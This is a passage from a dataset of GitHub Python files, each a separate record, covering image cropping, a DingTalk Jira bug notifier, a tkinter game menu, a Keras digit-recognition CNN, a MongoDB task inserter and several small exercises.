enumerate(list_of_files):\nfor file in enumerate(os.listdir(input_path)):\n print(\"Cropping the images...\")\n output_full_path = os.path.join(input_path, file[1])\n image = cv2.imread(output_full_path)\n if new_boxes[file[0]][0] == 0:\n print(file[1], \": NO BOX\")\n continue\n first_row = new_boxes[file[0]][0] ## x-max\n first_col = new_boxes[file[0]][1] ## y-max\n last_row = new_boxes[file[0]][2] ## x-min\n last_col = new_boxes[file[0]][3] ## y-min\n # Check image's height to width ratio.\n h, w = image.shape[:2]\n if h / w < height_to_width_ratio:\n print(\"ROTATE\")\n if first_row > w / 2:\n cropped_image = image[first_col:last_col, first_row:last_row]\n cropped_image = cv2.rotate(cropped_image, cv2.ROTATE_90_COUNTERCLOCKWISE)\n coords.append([image.shape[1] - last_row, first_col, last_col])\n else:\n cropped_image = image[first_col:last_col, last_row:first_row]\n cropped_image = cv2.rotate(cropped_image, cv2.ROTATE_90_CLOCKWISE)\n coords.append([image.shape[1] - first_row, first_col, last_col])\n\n else:\n cropped_image = image[first_col:last_col, first_row:last_row]\n coords.append([first_col, first_row, last_row])\n image_names.append(file[1])\n if save_results == True:\n crop_output_full_path = os.path.join(crop_output, file[1])\n cv2.imwrite(crop_output_full_path, cropped_image)\n\n# Save coords to csv\ncoords_dict = {}\n\nfor i in range(0,len(image_names),1):\n coords_dict[image_names[i]] = coords[i]\n\nwith open(cut_coords_path, 'w') as f_1:\n for key in coords_dict.keys():\n f_1.write(\"%s;%s\\n\"%(key,coords_dict[key]))\n\nprint(\"Image cropping results saved to:\" + crop_output)\nprint(\"Cut coordinates saved to:\", cut_coords_path)\n","repo_name":"EvoZooDeb/whiteboard","sub_path":"prototype_03/03_01_box_detect_an_cut.py","file_name":"03_01_box_detect_an_cut.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22959318167","text":"\nimport pygal\nfrom die import Die \n\n\ndie_1 = Die()\ndie_2 = Die()\ndie_3 = Die()\n\ndice = [die_1, die_2]\n\n\nresults = []\n\nfor roll_number in range(100000):\n\tresults.append(die_1.roll() * die_2.roll())\n\n\n\n\nfrequencies = [results.count(value) for value in range(1, die_1.num_sides*die_2.num_sides+1)]\n\n\n\nhist = pygal.Bar()\n\nhist.title = 'Results of rolling three dice 10000 times'\nhist.x_labels = [values for values in range(1, die_1.num_sides*die_2.num_sides+1)]\n\nhist.x_title = \"Results\"\nhist.y_title = \"Frequency of Result\"\n\nhist.add('dice', frequencies)\nhist.render_to_file('die_visual.svg')\n\n\n","repo_name":"tengyaolong2000/Random-stuff","sub_path":"Python Projects/die_visual.py","file_name":"die_visual.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10408746566","text":"# !/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :JiraBugPush\n@File :dingController.py\n@Author :琴师\n@Date :2022/10/28 10:19 上午\n\"\"\"\n\n# 今天\n\nimport dataSearchController\nimport requests\nimport json\nimport time\nfrom datetime import date\n\n# 今天\ntoday = date.today()\n\n\ndef getRequestUri():\n access_token = \"52097df2c2495168c6918c7c5ac468d9b14d8361753fe87axxxxxx\"\n uri = \"https://oapi.xxxxxxx?\" + \"access_token=%s\" % access_token\n return uri\n\n\ndef getRequestData(nums):\n my_data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"title\": \"JIRA\",\n \"text\": \"我就是我, 是不一样的烟火\"\n },\n \"at\": {\n \"isAtAll\": True\n }\n }\n if len(nums):\n # summary = \"\\n\"\n testProblem = \"\\n\"\n productProblem = \"\\n\"\n uat = \"\\n\"\n if dataSearchController.dataSearchType(bugtype=\"转测问题\"):\n for x in dataSearchController.dataSearchType(bugtype=\"转测问题\"):\n testProblem += x[6] + \"\\t\\t\\t\" + \"经办人:\" + \\\n x[4] + \"\\n\" + \"状态:\" + x[5] + \"\\n\"\n else:\n testProblem = \"0\" + \"\\n个\"\n\n if dataSearchController.dataSearchType(bugtype=\"体验走查\"):\n for y in dataSearchController.dataSearchType(bugtype=\"体验走查\"):\n uat += y[6] + \"\\t\\t\\t\" + \"经办人:\" + \\\n y[4] + \"\\n\" + \"状态:\" + y[5] + \"\\n\"\n else:\n uat = \"0\" + \"\\n个\"\n\n if dataSearchController.dataSearchType(bugtype=\"线上问题\"):\n for z in dataSearchController.dataSearchType(bugtype=\"线上问题\"):\n productProblem += z[6] + \"\\t\\t\\t\" + \\\n \"经办人:\" + z[4] + \"\\n\" + \"状态:\" + z[5] + \"\\n\"\n else:\n productProblem = \"0\" + \"\\n个\"\n\n res_content = \"今日新增问题:{}个,具体问题如下:\\n\" \\\n \"\\n【--转测问题--】:{}\\n\" \\\n \"=======================================\" \\\n \"\\n【--体验走查--】:{}\\n\" \\\n \"=======================================\" \\\n \"\\n【--线上问题(历史版本遗留)--】:{}\\n\\n\" \\\n \"=======================================\" \\\n \"\\nTips:优先解决转测问题和线上问题即可~\\n\".format(len(nums), testProblem, uat, productProblem)\n my_data[\"markdown\"][\"text\"] = res_content\n return my_data\n else:\n res_content = \"今日新增问题:{}个\".format(len(nums))\n my_data[\"markdown\"][\"text\"] = res_content\n return my_data\n\n\ndef send_request():\n # 传入url和内容发送请求\n # 构建一下请求头部\n header = {\"content-Type\": \"application/json\", \"Charset\": \"UTF-8\",\n \"timestamp\": str(round(time.time() * 1000))}\n sendData = json.dumps(\n getRequestData(\n dataSearchController.dataSearch())) # 将字典类型数据转化为json格式\n res = requests.post(\n url=getRequestUri(),\n data=sendData,\n headers=header,\n verify=False)\n # 将请求发回的数据构建成为文件格式\n return res.json()\n\n\nif __name__ == \"__main__\":\n pass\n\n","repo_name":"Amoqinshi/JiraBugPush","sub_path":"dingController.py","file_name":"dingController.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7387688267","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# vim: autoindent shiftwidth=4 expandtab textwidth=80 tabstop=4 softtabstop=4\n###############################################################################\n\nimport serial\n\n\n\n# files = ['setup.zpl', 'data1.zpl', 'data2.zpl']\nfiles = ['delete_image.zpl']\n\nfor file in files:\n ser = serial.Serial('/dev/ttyUSB0', baudrate=9600, bytesize=8, parity='N',\n stopbits=1, xonxoff=0, timeout=5)\n with open(file, 'r') as f:\n label = f.read()\n ser.write(label.encode())\n ser.close()\n\n","repo_name":"ssharpjr/part-label","sub_path":"examples/serial_test.py","file_name":"serial_test.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28614198400","text":"# Python Program to Interchange two Elements of the List without touching the Key Field\r\n# Node class to create individual nodes for the linked list\r\nclass Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n# LinkedList class to manage the nodes and perform operations on the linked list\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n # Method to add a new node at the end of the linked list\r\n def append(self, value):\r\n new_node = Node(value)\r\n if self.head is None:\r\n self.head = new_node\r\n return\r\n last_node = self.head\r\n while last_node.next:\r\n last_node = last_node.next\r\n last_node.next = new_node\r\n\r\n # Method to print the linked list\r\n def display(self):\r\n current = self.head\r\n while current:\r\n print(current.value, end=\" -> \")\r\n current = current.next\r\n print(\"None\")\r\n\r\n # Method to interchange two elements without changing the key field\r\n def interchange_elements(self, index1, index2):\r\n #checks both are same ,if same there is nothing to swap\r\n if index1 == index2:\r\n #return empty i.e nothing\r\n return\r\n\r\n prev1 = None\r\n current1 = self.head\r\n count1 = 0\r\n while current1 and count1 != index1:\r\n prev1 = current1\r\n current1 = current1.next\r\n count1 += 1\r\n\r\n prev2 = None\r\n current2 = self.head\r\n count2 = 0\r\n while current2 and count2 != index2:\r\n prev2 = current2\r\n current2 = current2.next\r\n count2 += 1\r\n#ikadiki ah index point ki reach avtai\r\n#this means current1,current2 is None then return nothing\r\n if not current1 or not current2:\r\n return\r\n#after reaching that particular index that value points to current2 value\r\n#ah index point lodi current2 value ki point chestai\r\n if prev1:\r\n prev1.next = current2\r\n #if prev1 doesnot exist current1 is the head of the LL,self.head is updated to current2,making current2 is the new head of the LL\r\n else:\r\n self.head = current2\r\n\r\n#if prev2 exist then at that value pointing to current1 value\r\n#ah index point lodi current2 value ki point chestai\r\n\r\n if prev2:\r\n prev2.next = current1\r\n #if prev 2 does not exist then head points to current1\r\n else:\r\n self.head = current1\r\n \r\n #after pointing completing this swaping takes place inorder to point to next value\r\n#here swaping is taking place curr1 with curr2 and curr2 with curr1\r\n#finaly pointing chesin tarvata next unna values ni ila swap chesi point cheyachu\r\n current1.next, current2.next = current2.next, current1.next\r\n\r\n# Example usage:\r\nif __name__ == \"__main__\":\r\n # Creating a linked list\r\n linked_list = LinkedList()\r\n linked_list.append(1)\r\n linked_list.append(2)\r\n linked_list.append(3)\r\n linked_list.append(4)\r\n linked_list.append(5)\r\n\r\n # Displaying the original linked list\r\n print(\"Original Linked List:\")\r\n linked_list.display()\r\n\r\n # Interchanging elements at indices 1 and 3\r\n linked_list.interchange_elements(1, 3)\r\n\r\n # Displaying the modified linked list after interchanging elements\r\n print(\"\\nLinked List after interchanging elements at indices 1 and 3:\")\r\n linked_list.display()\r\n","repo_name":"coderkarunakar/linked_list-2","sub_path":"practice/interchange_LL..py","file_name":"interchange_LL..py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74514324968","text":"from django.conf.urls import url\n\nfrom . import views\n\nissue_list_view = views.IssueListView.as_view()\nissue_create_view = views.IssueCreateView.as_view()\nissue_detail_view = views.IssueDetailView.as_view()\nissue_update_view = views.IssueUpdateView.as_view()\nissue_delete_view = views.IssueDeleteView.as_view()\n\nurlpatterns = [\n url(r'^$', issue_list_view, name='issue_list'),\n url(r'^create/$', issue_create_view, name='issue_create'),\n url(r'^(?P\\d+)/$', issue_detail_view, name='issue_detail'),\n url(r'^(?P\\d+)/edit/$', issue_update_view, name='issue_update'),\n url(r'^(?P\\d+)/delete/$', issue_delete_view, name='issue_delete'),\n]\n","repo_name":"lucifurtun/issue-tracker","sub_path":"apps/tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35842634635","text":"''' Our main menu + settings menu '''\n\nimport tkinter as tk\nimport tkinter.font as tkfont\nimport os\nimport json\nfrom test import start_level\nfrom time import time, sleep\nimport functools\n\n\n# set default settings\nuser_settings = {\n \"sound\": False,\n \"jump\": \"w\",\n \"duck\": \"s\",\n \"run_right\": \"d\",\n \"run_left\": \"a\",\n \"force\": \"e\",\n \"atack\": \"space\"\n}\n\n# init globals\nframes_lapsed = 0\nstate = \"\"\nstates_label = {\n \"sound\": False,\n \"jump\": None,\n \"duck\": None,\n \"run_right\": None,\n \"run_left\": None,\n \"force\": None,\n \"atack\": None\n}\nmy_objects = []\ndrag_point = {}\ncurrent_drag_sprite = None\npicture_parent_directory = './menu_pics/'\nsettings_file_name = 'settings.json'\ngame_not_started = True\nwindow_width = 1600\nwindow_height = 800\nbackground_width = 2600\n\nTARGET_FPS = 30\nframe_period = 1.0/TARGET_FPS\nnow = time()\nnext_frame_time = now + frame_period\n\n# declare classes\nclass Sprite:\n ''' Pictures on the main screen '''\n anchor_offsets = {\n tk.CENTER: {'x': -0.5, 'y': -0.5},\n tk.NW: {'x': 0, 'y': 0},\n tk.SW: {'x': 0, 'y': -1},\n tk.NE: {'x': -1, 'y': 0},\n tk.SE: {'x': -1, 'y': -1}\n }\n\n def __init__(\n self, ID=\"?\",x=0, y=0, width=0, height=0,\n anchor=tk.NW, img_file=None, parent_frame=None\n ):\n self.ID = ID\n self.x = x + width * self.anchor_offsets[anchor]['x']\n self.y = y + height * self.anchor_offsets[anchor]['y']\n self.width = width\n self.height = height\n self.image = tk.PhotoImage(file=img_file)\n self.instance = parent_frame.create_image(\n x, y,\n anchor=anchor,\n image=self.image\n )\n self.parent_frame=parent_frame\n self.last_movement_x = 0\n self.last_movement_y = 0\n\n def on_click(self, offset_x, offset_y):\n ''' Might be overriden '''\n pass # noqa , function meant to be extended\n\n def move(self, dx, dy):\n ''' Moves sprite if needed '''\n self.parent_frame.move(self.instance, dx, dy)\n self.x += dx\n self.y += dy\n self.last_movement_x = dx\n self.last_movement_y = dy\n\nclass DragableSprite(Sprite):\n ''' Sprites which you can move with mouse '''\n def on_click(self, offset_x, offset_y):\n global current_drag_sprite\n\n self.drag_point = {\"x\": offset_x, \"y\": offset_y}\n\n current_drag_sprite = self\n\nclass PlayButton(Sprite):\n ''' Button that starts level '''\n def on_click(self, offset_x, offset_y):\n global game_not_started\n\n main_menu.pack_forget()\n game_not_started = False\n start_level(root)\n\nclass SettingsButton(Sprite):\n ''' Button that sends you to settings menu '''\n def on_click(self, offset_x, offset_y):\n change_frame(main_menu, settings_frame)\n\nclass ExitButton(Sprite):\n ''' Button that exits program '''\n def on_click(self, offset_x, offset_y):\n os._exit(0) # noqa , only way to kill child processes\n\n\n# set up screen\nroot = tk.Tk()\nroot.geometry(str(window_width)+'x'+str(window_height))\n\nmain_menu = tk.Canvas(root, bg=\"black\")\nmain_menu.pack(fill=tk.BOTH, expand=1)\n\nsettings_frame =\\\n tk.Frame(root, width=window_width, height=window_height, bg=\"black\")\n\nb_background =\\\n tk.PhotoImage(file=picture_parent_directory+\"b_background.png\")\nb_background_instance =\\\n main_menu.create_image(0, 0, image=b_background, anchor=tk.NW)\nb_background_instance_next =\\\n main_menu.create_image(background_width/2, 0, image=b_background, anchor=tk.NW)\n\nmy_objects.append(\n DragableSprite(\n x=80,\n y=500,\n width=65,\n height=97,\n img_file=picture_parent_directory+\"b_planet_ring.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n DragableSprite(\n x=1100,\n y=50,\n width=57,\n height=57,\n img_file=picture_parent_directory+\"b_planet.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n DragableSprite(\n x=1400,\n y=480,\n width=176,\n height=176,\n img_file=picture_parent_directory+\"b_death_star.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n Sprite(\n x=10,\n y=230,\n img_file=picture_parent_directory+\"1_title_image.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n PlayButton(\n x=window_width*0.5,\n y=480,\n width=228,\n height=100,\n img_file=picture_parent_directory+\"m_play.png\",\n parent_frame=main_menu,\n anchor=tk.CENTER\n )\n)\nmy_objects.append(\n SettingsButton(\n x=715,\n y=600,\n width=169,\n height=50,\n img_file=picture_parent_directory+\"m_settings.png\",\n parent_frame=main_menu\n )\n)\nmy_objects.append(\n ExitButton(\n x=750,\n y=680,\n width=100,\n height=50,\n img_file=picture_parent_directory+\"m_exit.png\",\n parent_frame=main_menu\n )\n)\n\n# reverse order of objects,\n# so that ones which are on top have higher interaction priority\nmy_objects.reverse()\n\nregular_font = tkfont.Font(family='Noto Sans Display', size=16)\n\n\n# main functional\ndef load_settings():\n ''' Loads settings '''\n global user_settings\n\n open(settings_file_name, \"a+\")\n try:\n user_settings = json.load(open(settings_file_name))\n except:\n pass\n\ndef save_settings():\n ''' Saves settings '''\n global user_settings\n\n # create file if not found\n open(settings_file_name, \"a+\")\n\n json.dump(user_settings, open(settings_file_name, \"w\"))\n\n\ndef change_frame(this_frame, next_frame):\n ''' Changes frame '''\n this_frame.pack_forget()\n next_frame.pack(fill=tk.BOTH, expand=1)\n root.update()\n\ndef press_button_main_menu(event):\n ''' Detects if user clicked on sprite in main menu '''\n for obj in my_objects:\n if obj.x < event.x < obj.x + obj.width\\\n and obj.y < event.y < obj.y + obj.height:\n print(\"e\")\n obj.on_click(obj.x - event.x,obj.y - event.y)\n\ndef drag_sprite(event):\n ''' Moves movable sprite while mouse clicked and moving '''\n for obj in my_objects:\n if isinstance(obj, DragableSprite):\n if obj is current_drag_sprite:\n obj.move(\n event.x + obj.drag_point[\"x\"] - obj.x,\n event.y + obj.drag_point[\"y\"] - obj.y\n )\n print(obj.last_movement_x, obj.last_movement_y)\n\ndef release_sprite(event): # noqa , parameter event needed for callback signature\n ''' Stops current movable sprite from moving when unclicked'''\n global current_drag_sprite\n\n current_drag_sprite = None\n\ndef flip_sound_setting():\n ''' Turns sound off if it`s turned on,\n and turns sound on if it`s turned off '''\n global user_settings\n\n user_settings[\"sound\"] = not user_settings[\"sound\"]\n\n on_label = tk.Label(\n master=settings_frame,\n text='ON',\n font=regular_font,\n fg='white',\n bg='green'\n )\n off_label = tk.Label(\n master=settings_frame,\n text='OFF',\n font=regular_font,\n fg='black',\n bg='red'\n )\n\n sound_label = on_label if user_settings[\"sound\"] else off_label\n\n sound_label.place(\n relx=0.5,\n rely=0.17,\n width=window_width*0.07,\n height=window_height*0.07,\n anchor=tk.CENTER\n )\n\n save_settings()\n\ndef on_key_press(event):\n ''' Reasignes control key of a selected action '''\n global state, states_label\n\n if state != \"\":\n states_label[state].configure(text=event.keysym)\n user_settings[state] = event.keysym\n state = \"\"\n save_settings()\n else:\n return\n\ndef change_state_to(state_parameter):\n ''' Detects which action is changes control key '''\n global state\n\n state = state_parameter\n\ndef add_button_with_label(\n master=settings_frame,\n text=\"?\",\n font=regular_font,\n foreground=\"blue\",\n command=None,\n function_arguments=(),\n relx=0.5,\n rely=0.5,\n button_width=150,\n button_height=50,\n label_width=150,\n label_height=50,\n anchor=tk.CENTER,\n ID=\"unnamed\"\n):\n ''' Adds button and it`s corresponding label '''\n tk.Button(\n master=master,\n text=text,\n font=font,\n fg=foreground,\n command=functools.partial(command, function_arguments)\n ).place(\n relx=relx-button_width/window_width/2,\n rely=rely,\n width=button_width,\n height=button_height,\n anchor=anchor\n )\n states_label[ID]=tk.Label(\n master=master,\n text=user_settings[ID],\n font=font,\n fg=foreground,\n )\n states_label[ID].place(\n relx=relx*1.01+button_width/window_width/2,\n rely=rely*1.01,\n width=label_width,\n height=label_height,\n anchor=anchor\n )\n\ndef restart_fps_timer():\n ''' Resets the variables associated with fps waiting '''\n global frame_period, TARGET_FPS, now, next_frame_time\n\n frame_period = 1.0/TARGET_FPS\n now = time()\n next_frame_time = now + frame_period\n\ndef animate_background():\n ''' Animates stars and palnets on the background '''\n global b_background_instance, b_background_instance_next,\\\n frames_lapsed, frame_period, TARGET_FPS, now, next_frame_time\n\n now = time()\n while now < next_frame_time:\n sleep(next_frame_time - now)\n now = time()\n\n next_frame_time = now + frame_period\n\n frames_lapsed += 1\n\n main_menu.move(b_background_instance, -1, 0)\n main_menu.move(b_background_instance_next, -1, 0)\n\n if frames_lapsed >= 1300:\n # kinda reset\n main_menu.delete(b_background_instance)\n b_background_instance = b_background_instance_next\n b_background_instance_next = main_menu.create_image(\n 1300,\n 0,\n image=b_background,\n anchor=tk.NW\n )\n main_menu.lower(b_background_instance_next)\n frames_lapsed = 0\n # inertia implentation\n for obj in my_objects:\n if obj is not current_drag_sprite:\n obj.move(obj.last_movement_x, obj.last_movement_y)\n root.update()\n\n# make some preparations\nload_settings()\nflip_sound_setting()\nflip_sound_setting()\n\n# set up settings UI\ntk.Button(\n master=settings_frame,\n text='Sound',\n font=regular_font,\n fg='blue',\n command=flip_sound_setting\n).place(\n relx=0.5,\n rely=0.1,\n width=window_width*0.2,\n height=window_height*0.07,\n anchor=tk.CENTER\n)\n\ntk.Button(\n master=settings_frame,\n text='Return to main menu',\n font=regular_font,\n fg='blue',\n command=lambda:change_frame(settings_frame, main_menu)\n).place(\n relx=0.5,\n rely=0.8,\n width=window_width*0.2,\n height=window_height*0.07,\n anchor=tk.CENTER\n)\n\ncontrol_button_relx = 0.5\ncontrol_button_rely = 0.3\ndelta_rely = 0.07\nfor key in user_settings:\n if key == 'sound':\n continue\n\n add_button_with_label(\n text=key,\n command=change_state_to,\n function_arguments=(key),\n relx=control_button_relx,\n rely=control_button_rely,\n button_width=window_width*0.1,\n button_height=window_height*delta_rely*0.9,\n label_width=window_width*0.1,\n label_height=window_height*delta_rely*0.9,\n ID=key\n )\n control_button_rely += delta_rely\n\nroot.bind(\"\", on_key_press)\nmain_menu.bind(\"\", press_button_main_menu)\nmain_menu.bind(\"\", drag_sprite)\nmain_menu.bind(\"\", release_sprite)\n\n\nwhile game_not_started:\n startTime = time()\n animate_background()\n endTime = time()\n elapsedTime = endTime - startTime\n print(1./elapsedTime)\n","repo_name":"Nocommas555/TurtlePatformer","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":11731,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71951720489","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 14 06:48:04 2020\r\n\r\n@author: jayar\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.utils.np_utils import to_categorical\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Flatten, Dropout\r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.optimizers import Adam\r\nimport pickle\r\nimport os\r\n\r\nimages_path = os.getcwd()+r'\\myData'\r\nclasses = len(range(0,10,1))\r\nimages = []\r\nclassNbr = []\r\nnbrClasses = list(range(0,10,1))\r\n\r\n# import images and corresponding classes\r\nfor i in nbrClasses:\r\n pics_list = os.listdir(images_path+f'\\{i}')\r\n for pic in pics_list:\r\n img = cv2.imread(images_path+f'\\{i}'+f'\\{str(pic)}')\r\n img = cv2.resize(img, (64,64))\r\n images.append(img)\r\n classNbr.append(i)\r\ncv2.imshow('simple image', images[45])\r\ncv2.waitKey(0)\r\nprint(len(images), len(classNbr))\r\n\r\nimages = np.array(images)\r\nclassNbr = np.array(classNbr)\r\nprint(images.shape, classNbr.shape)\r\n\r\nfor x in range(10):\r\n print(f\"class {x} has {len(np.where(classNbr==x)[0])}\")\r\n \r\n# Image processing to gray scale, blur, equalize histogram to increase intensity and normalize the array\r\ndef preprocessing(img):\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n img = cv2.GaussianBlur(img,(5,5),cv2.BORDER_DEFAULT)\r\n img = cv2.equalizeHist(img)\r\n img = img/255\r\n return img\r\n\r\nX_train,X_test,y_train,y_test = train_test_split(images,classNbr,test_size=0.2)\r\nX_train,X_validation,y_train,y_validation = train_test_split(X_train,y_train,test_size=0.2)\r\nprint(X_train.shape)\r\nprint(X_test.shape)\r\nprint(X_validation.shape)\r\nfor x in range(10):\r\n print(f\"class {x} has {len(np.where(y_validation==x)[0])}\")\r\n \r\n \r\n# expanding the image array to include one channel for keras training\r\nX_train = np.array(list(map(preprocessing, X_train))).reshape((X_train.shape[0],X_train.shape[1],X_train.shape[2],1))\r\nX_test = np.array(list(map(preprocessing, X_test))).reshape((X_test.shape[0],X_test.shape[1],X_test.shape[2],1))\r\nX_validation = np.array(list(map(preprocessing, X_validation))).reshape((X_validation.shape[0],X_validation.shape[1],X_validation.shape[2],1))\r\n\r\n\r\n\"\"\"\r\nImage Augmentation using keras for generating images with different params (horizontal and vertical flips were avoided)\r\none hot encoding of y classes\r\n\"\"\" \r\n\r\nimage_gen = ImageDataGenerator(width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n brightness_range=(1,2),\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n rotation_range=10)\r\n\r\nimage_gen.fit(X_train)\r\ny_train = to_categorical(y_train, classes)\r\ny_test = to_categorical(y_test, classes)\r\ny_validation = to_categorical(y_validation, classes)\r\n\r\n\r\n# CNN model Lenet model\r\ndef lenet_model():\r\n model = Sequential()\r\n model.add((Conv2D(60,(5,5),input_shape=(64,64,1),activation='relu')))\r\n model.add((Conv2D(60, (5,5), activation='relu')))\r\n model.add(MaxPooling2D((2,2)))\r\n model.add((Conv2D(30, (3,3), activation='relu')))\r\n model.add((Conv2D(30, (3,3), activation='relu')))\r\n model.add(MaxPooling2D((2,2)))\r\n model.add(Dropout(0.5))\r\n model.add(Flatten())\r\n model.add(Dense(500,activation='relu'))\r\n model.add(Dropout(0.5))\r\n model.add(Dense(classes, activation='softmax'))\r\n model.compile(Adam(lr=0.001),loss='categorical_crossentropy',metrics=['accuracy'])\r\n return model\r\nmodel = lenet_model()\r\n\r\nprint(model.summary())\r\n\r\ntraining = model.fit_generator(image_gen.flow(X_train, y_train, batch_size=50),\r\n steps_per_epoch=2000,\r\n epochs=20,\r\n validation_data=(X_validation,y_validation), \r\n shuffle=1)\r\n\r\npickle_model = open('model.p', 'wb+')\r\npickle.dump(model, pickle_model)\r\npickle_model.close()\r\n\r\n\r\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(8,5)) \r\nax[0].plot(training.history['loss'])\r\nax[0].plot(training.history['val_loss'])\r\nax[0].legend(['training', 'validation'])\r\nax[0].set_title('Loss')\r\nax[0].set_xlabel('epochs')\r\nax[1].plot(training.history['accuracy'])\r\nax[1].plot(training.history['val_accuracy'])\r\nax[1].legend(['training', 'validation'])\r\nax[1].set_title('Accuracy')\r\nax[1].set_xlabel('epochs')\r\nfig.tight_layout()\r\n\r\n\r\ntest_score = model.evaluate(X_test,y_test,verbose=1)\r\nprint(f'Test loss: {test_score[0]} and Test accuracy: {test_score[1]}')","repo_name":"jayaram87/DIGIT_CNN_LENET_CLASSFIER","sub_path":"lenet_cnn_model.py","file_name":"lenet_cnn_model.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079485736","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/8/8 上午8:19\n# @Author : Hou Rong\n# @Site :\n# @File : mongo_task.py\n# @Software: PyCharm\nfrom data_source import MysqlSource\nfrom my_logger import get_logger\nfrom MongoTask.MongoTaskInsert import InsertTask\nfrom service_platform_conn_pool import fetchall, spider_base_tmp_wanle_pool, spider_base_tmp_wanle_test_pool\n\nlogger = get_logger(\"insert_mongo_task\")\n\n\n# def get_tasks():\n# f = open('/tmp/img_list(7).csv')\n# for line in f:\n# sid, _, url = line.strip().split(',')\n# yield sid, url\ndef get_tasks():\n sql = '''SELECT sid, url FROM img_list;'''\n for line in fetchall(spider_base_tmp_wanle_pool, sql, is_dict=True):\n yield line['sid'], line['url']\n sql = '''SELECT sid, url FROM img_list;'''\n for line in fetchall(spider_base_tmp_wanle_test_pool, sql, is_dict=True):\n yield line['sid'], line['url']\n\n\ndef insert_task():\n with InsertTask(worker='proj.total_tasks.images_task', queue='file_downloader', routine_key='file_downloader',\n task_name='image_wanle_huantaoyou', source='huantaoyou', _type='FileDownloader',\n priority=11) as it:\n for sid, url in get_tasks():\n args = {\n 'source': \"huantaoyou\",\n 'source_id': sid,\n 'target_url': url,\n 'bucket_name': 'mioji-wanle',\n 'file_prefix': 'huantaoyou',\n 'is_poi_task': True,\n 'need_insert_db': True,\n }\n it.insert_task(args)\n\n\nif __name__ == '__main__':\n insert_task()\n","repo_name":"20113261/p_m","sub_path":"MongoTask/test_huantaoyou_img_task.py","file_name":"test_huantaoyou_img_task.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28087652464","text":"# Реализовать генераторную функцию, принимающую итератор произвольных объектов и возвращающую их без повторений.\n# Порядок следования объектов должен сохраниться.\n\n\ndef distinct(iter):\n used = set()\n for item in iter:\n if item not in used:\n used.add(item)\n yield item\n\n","repo_name":"NitroLine/python-task-help","sub_path":"21-30/26_distinct.py","file_name":"26_distinct.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19983403337","text":"import math\r\nfrom collections import Counter\r\n\r\n\r\nclass StatsCounter(Counter):\r\n @property\r\n def mean(self) -> float:\r\n sum0 = sum(v for k, v in self.items())\r\n sum1 = sum(k * v for k, v in self.items())\r\n return sum1 / sum0\r\n\r\n @property\r\n def stdev(self) -> float:\r\n sum0 = sum(v for k, v in self.items())\r\n sum1 = sum(k * v for k, v in self.items())\r\n sum2 = sum(k * k * v for k, v in self.items())\r\n return math.sqrt(\r\n sum0 * sum2 - sum1 * sum1\r\n ) / sum0\r\n","repo_name":"DavidGugea/Mastering-Object-Oriented-Python-Programming","sub_path":"Section1/Chapter7/StatsCounterMapping.py","file_name":"StatsCounterMapping.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72992198249","text":"import numpy as np\nimport wave as wave\nimport sounddevice as sd\n\nsample_wave_file = \"wgn_wave.wav\"\nwav = wave.open(sample_wave_file)\ndata = wav.readframes(wav.getnframes())\ndata = np.frombuffer(data, dtype=np.int16)\n\nsd.play(data, wav.getframerate())\n\nprint(\"再生開始\")\n\nstatus = sd.wait()\n\nprint(\"再生停止\")\n","repo_name":"CC-WO/SoundSourceSeparation","sub_path":"src/code2.6.py","file_name":"code2.6.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185141320","text":"N = int(input())\np = list(map(int,input().split(\" \")))\norder = list(range(1,N+1))\n\ni = 0\nans = 0\n\nwhile i < (N-1):\n\tif p[i] == 